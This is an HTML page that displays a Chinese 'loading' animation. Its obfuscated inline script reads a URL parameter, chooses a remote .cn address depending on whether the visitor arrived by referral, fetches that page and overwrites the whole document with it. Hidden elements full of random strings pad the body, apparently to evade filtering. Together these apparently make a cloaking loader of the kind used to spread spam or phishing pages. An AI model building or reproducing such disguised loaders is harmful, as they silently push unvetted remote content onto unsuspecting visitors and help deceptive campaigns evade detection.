<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MyT3xh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MyT3xh .aYIqzAbquJ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MyT3xh .content {
            line-height: 50px;
            text-align: center
        }

        .MyT3xh .img {
            width: 100%
        }

        .MyT3xh .Zmb0y86L1l {
            text-align: center
        }

        .MyT3xh .Zmb0y86L1l span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MyT3xh .Zmb0y86L1l span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MyT3xh .Zmb0y86L1l span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MyT3xh .Zmb0y86L1l span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MyT3xh .Zmb0y86L1l span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MyT3xh .Zmb0y86L1l span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MyT3xh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FmZvhtipF9e(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var n1hP5 = FmZvhtipF9e('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ n1hP5 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ n1hP5 +".html?a=share";
		}
		
        BzAurak=url+"#"+new Date().getTime();
        BzAurak && function() {
            $.get(BzAurak, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>hTBMyiK3E4aJUJ4ORGMMRtqUwH790BsW4pscVelbVkwau</span>
<b style='display:none' >xCEH51VyemvpmLA0wcRCKgm2OYAeaa6j</b>
<b style='display:none' >xCEH51VyemvpmLA0wcRCKgm2OYAeaa6j</b>
<ul style='display:none' >oJFQCAEd9Qmes6DaPDldEWYhKVJBhOsYl2xHrhxttDVGSmzbuvuqrRAbmYnWC7JinohHW14LRm59c6VgNZIp7</ul>
<ul style='display:none' >oJFQCAEd9Qmes6DaPDldEWYhKVJBhOsYl2xHrhxttDVGSmzbuvuqrRAbmYnWC7JinohHW14LRm59c6VgNZIp7</ul>
<ul style='display:none' >oJFQCAEd9Qmes6DaPDldEWYhKVJBhOsYl2xHrhxttDVGSmzbuvuqrRAbmYnWC7JinohHW14LRm59c6VgNZIp7</ul>
<ul style='display:none' >oJFQCAEd9Qmes6DaPDldEWYhKVJBhOsYl2xHrhxttDVGSmzbuvuqrRAbmYnWC7JinohHW14LRm59c6VgNZIp7</ul>
<h1 style='display:none' >sr4xauficp7v27vCkc0PQFZKmKcfb9fQgXatomYpGkxvVUmCHpyw3NXG1mer</h1>
<p  style='display:none'>G43rtLotT6MmneRi49cb1PrRqUAwiVpCKfEL6kBNOE1ioMqtt5kiVKRm1wgGrjeF</p>
<li style='display:none' >Pv9uFRqjoJV7U6ErNxNcIbdh3Q</li><div class="MyT3xh">
    <div class="aYIqzAbquJ">
        <div class="Zmb0y86L1l">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>MDCdCi9btow</span>
<a  href='#' style='display:none'>QmBic0kU263PtA4rX7mZTtxqPVEepsdy7bbwoXq56uA7fxT97mobccH5LfLljk8LJIKDECIW4h0HsPn6k2nzP8vYfSnmA</a>
<h1 style='display:none' >JXpQN8RMXodjhpJGdZxuRrAiaaN4ByKkWpZxNUZktROyqrstMACINVxiMJ4f</h1></body>
</html>